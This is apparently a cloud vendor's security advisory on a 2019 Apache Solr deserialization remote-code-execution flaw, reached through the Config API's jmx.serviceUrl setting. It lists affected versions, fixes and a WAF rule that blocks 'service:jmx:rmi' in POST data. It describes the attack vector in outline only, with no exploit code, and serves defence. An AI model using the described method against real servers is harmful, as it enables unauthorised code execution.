On March 7, 2019, Alibaba Cloud Security emergency response center detected a Solr security bulletin issued by Apache. Attackers can call the Config API and modify the jmx.serviceUrl attribute to point to a malicious RMI service, which causes a deserialization remote code execution (RCE) vulnerability in Apache Solr.



Vulnerability name

Deserialization RCE vulnerability in Apache Solr

Vulnerability description

The Config API allows to configure the jmx.serviceUrl attribute by using an HTTP POST request. This configuration modifies the Apache Solr JMX server. Attackers can point the request to a malicious RMI server and take advantage of the unsafe deserialization of Solr to trigger RCE.jmx.serviceUrl

Affected versions

  • Apache Solr 5.00 to 5.5.5
  • Apache Solr 6.00 to v6.6.5


  • Upgrade your Apache Solr to 7.0 or later.
  • Disable the Config API by configuring disable.configEdit=true.
  • Ensure that only trusted traffic is allowed to access the Solr server at the network layer.
If you cannot resolve the issue by using the first two solutions, recompile Solr by using the official patch.

Protection recommendations

If you do not want to upgrade Solr to resolve this vulnerability, we recommend that you use the custom protection policy feature provided by WAF to protect your business.

You can use the custom protection policy feature to restrict POST requests that contain specific JSON data, such as service:jmx:rmi. This can also prevent RCE attacks.Edit a rule